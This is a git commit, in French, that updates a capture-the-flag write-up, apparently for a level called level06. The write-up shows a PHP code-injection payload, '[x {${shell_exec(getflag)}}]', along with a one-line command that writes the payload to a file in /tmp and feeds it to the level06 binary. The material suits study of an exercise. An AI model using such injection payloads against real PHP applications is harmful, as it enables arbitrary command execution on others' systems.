legere amelioration

simplification de l'utilisation de l'exploit
This commit is contained in:
Lapin 2021-02-02 17:52:29 +01:00
parent 07f4325c5a
commit 778ecf386d
1 changed files with 4 additions and 3 deletions

View File

@ -13,8 +13,9 @@ on remarque qu'on peut utiliser une commande shell en php avec shell_exec, il su
shell_exec(getflag) shell_exec(getflag)
dans la regex dans la regex
il faut un ficher avec il faut un ficher avec: [x {${shell_exec(getflag)}}]
puis rentrer ce fichier en argument du binaire level06
$ echo '[x {${shell_exec(getflag)}}]' > /tmp/exploit06 && ./level06 /tmp/exploit06
[x {${shell_exec(getflag)}}]
puis rentrer ce fichier en argument du binaire level06